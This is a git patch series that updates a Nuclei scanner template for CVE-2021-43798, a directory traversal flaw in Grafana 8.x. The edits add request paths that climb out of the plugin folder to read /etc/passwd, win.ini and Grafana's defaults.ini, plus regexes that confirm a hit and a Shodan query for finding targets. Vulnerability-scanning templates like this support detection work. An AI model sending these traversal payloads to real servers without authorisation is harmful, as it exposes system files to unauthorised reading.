From a558791c0803b703d2005958bc76b018cd779586 Mon Sep 17 00:00:00 2001 From: j4vaovo <128683738+j4vaovo@users.noreply.github.com> Date: Tue, 18 Apr 2023 23:23:43 +0800 Subject: [PATCH 1/3] Update CVE-2021-43798.yaml --- cves/2021/CVE-2021-43798.yaml | 10 +++++++--- 1 file changed, 7 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml index 73f3f78b8f..08d88ae9f4 100644 --- a/cves/2021/CVE-2021-43798.yaml +++ b/cves/2021/CVE-2021-43798.yaml @@ -2,7 +2,7 @@ id: CVE-2021-43798 info: name: Grafana v8.x Arbitrary File Read - author: z0ne,dhiyaneshDk + author: z0ne,dhiyaneshDk,j4vaovo severity: high description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin. reference: @@ -24,16 +24,20 @@ requests: - method: GET path: - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd" + - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini" + - "{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini" + stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - "root:.*:0:0:" + - "for 16-bit app support" + - "socket = /tmp/grafana.sock" + condition: or - type: status status: - 200 - -# Enhanced by mp on 2022/02/28 From afb9dc63531ad6d817f95b7568e5ae7d1c84e429 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 20 Apr 2023 02:50:57 +0530 Subject: [PATCH 2/3] updated matchers and info --- cves/2021/CVE-2021-43798.yaml | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml index 08d88ae9f4..2e81b25034 100644 --- a/cves/2021/CVE-2021-43798.yaml +++ b/cves/2021/CVE-2021-43798.yaml @@ -1,7 +1,7 @@ id: CVE-2021-43798 info: - name: Grafana v8.x Arbitrary File Read + name: Grafana v8.x - Arbitrary File Read author: z0ne,dhiyaneshDk,j4vaovo severity: high description: Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin. @@ -17,6 +17,7 @@ info: cve-id: CVE-2021-43798 cwe-id: CWE-22 metadata: + verified: "true" shodan-query: title:"Grafana" tags: cve,cve2021,grafana,lfi @@ -30,12 +31,11 @@ requests: stop-at-first-match: true matchers-condition: and matchers: - - type: regex regex: - "root:.*:0:0:" - - "for 16-bit app support" - - "socket = /tmp/grafana.sock" + - "\\[(font|extension|file)s\\]" + - "socket\s*=\s*\/tmp\/grafana\.sock" condition: or - type: status From 44ca255ac3f8b2ae5dd7b48302be2deef97348ac Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Thu, 20 Apr 2023 13:56:10 +0530 Subject: [PATCH 3/3] change to single quote --- cves/2021/CVE-2021-43798.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-43798.yaml b/cves/2021/CVE-2021-43798.yaml index 2e81b25034..79712fc1e5 100644 --- a/cves/2021/CVE-2021-43798.yaml +++ b/cves/2021/CVE-2021-43798.yaml @@ -24,18 +24,18 @@ info: requests: - method: GET path: - - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd" - - "{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini" - - "{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini" + - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../etc/passwd' + - '{{BaseURL}}/public/plugins/alertlist/../../../../../../../../../../../../../../../../../../../windows/win.ini' + - '{{BaseURL}}/public/plugins/alertlist/../../../../../conf/defaults.ini' stop-at-first-match: true matchers-condition: and matchers: - type: regex regex: - - "root:.*:0:0:" - - "\\[(font|extension|file)s\\]" - - "socket\s*=\s*\/tmp\/grafana\.sock" + - 'root:.*:0:0:' + - '\\[(font|extension|file)s\\]' + - 'socket\s*=\s*\/tmp\/grafana\.sock' condition: or - type: status